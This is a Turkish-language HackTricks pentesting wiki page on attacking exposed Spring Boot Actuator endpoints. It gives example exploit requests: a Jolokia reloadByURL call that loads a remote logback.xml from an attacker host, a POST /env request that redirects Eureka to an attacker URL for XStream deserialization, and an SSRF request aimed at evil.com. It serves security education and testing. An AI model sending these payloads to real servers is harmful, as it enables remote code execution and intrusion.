mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 22:18:27 +00:00
4.6 KiB
4.6 KiB
Spring Actuators
AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız ABONELİK PLANLARINI kontrol edin!
- Resmi PEASS & HackTricks ürünlerini alın
- The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- Katılın 💬 Discord grubuna veya telegram grubuna veya bizi Twitter 🐦 @carlospolopm** takip edin.**
- Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
Spring Auth Atlatma
![](/Mirrors/hacktricks/media/commit/85dbc45d289fb4c243740693f878c242e4611558/.gitbook/assets/image%20%28927%29.png)
Şuradan https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Spring Boot Actuators'ü Sömürme
Orijinal yazıyı kontrol edin [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Ana Noktalar:
- Spring Boot Actuators,
/health
,/trace
,/beans
,/env
gibi uç noktaları kaydeder. Sürümler 1'den 1.4'e kadar, bu uç noktalara kimlik doğrulama olmadan erişilebilir. Sürüm 1.5'ten itibaren yalnızca/health
ve/info
varsayılan olarak hassas olmayan uç noktalardır, ancak geliştiriciler genellikle bu güvenliği devre dışı bırakırlar. - Belirli Actuator uç noktaları hassas verileri açığa çıkarabilir veya zararlı eylemlere izin verebilir:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
ve/heapdump
.- Spring Boot 1.x'te actuator'ler kök URL altında kaydedilirken, 2.x'te
/actuator/
temel yolun altında kaydedilir.
Sömürü Teknikleri:
- '/jolokia' Üzerinden Uzaktan Kod Yürütme:
/jolokia
actuator uç noktası, HTTP erişimine izin veren Jolokia Kütüphanesini açığa çıkarır.reloadByURL
eylemi, dış URL'den günlüğü yeniden yüklemek için sömürülebilir, bu da oluşturulmuş XML yapılandırmaları aracılığıyla kör XXE veya Uzaktan Kod Yürütme'ye yol açabilir.- Örnek sömürü URL'si:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
- '/env' Üzerinden Yapılandırma Değişikliği:
- Spring Cloud Kütüphaneleri varsa,
/env
uç noktası çevresel özelliklerin değiştirilmesine izin verir. - Özellikler, Eureka servisURL'sindeki XStream deserializasyon açığı gibi zafiyetlerin sömürülmesi için manipüle edilebilir.
- Örnek sömürü POST isteği:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Diğer Faydalı Ayarlar:
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
vespring.datasource.tomcat.max-active
gibi özellikler, SQL enjeksiyonu veya veritabanı bağlantı dizelerinin değiştirilmesi gibi çeşitli sömürüler için manipüle edilebilir.
Ek Bilgiler:
- Varsayılan actuator'lerin kapsamlı bir listesi burada bulunabilir.
- Spring Boot 2.x'te
/env
uç noktası özellik değişiklikleri için JSON formatını kullanır, ancak genel kavram aynı kalır.
İlgili Konular:
- Env + H2 RCE:
/env
uç noktası ve H2 veritabanının kombinasyonunu sömürme detayları burada bulunabilir.
- Yanlış Yol Adı Yorumlamasıyla Spring Boot Üzerinde SSRF:
- Spring çerçevesinin HTTP yol adlarında matris parametrelerini (
;
) işleme şekli, Sunucu Tarafı İstek Sahteciliği (SSRF) için sömürülebilir. - Örnek sömürü isteği:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close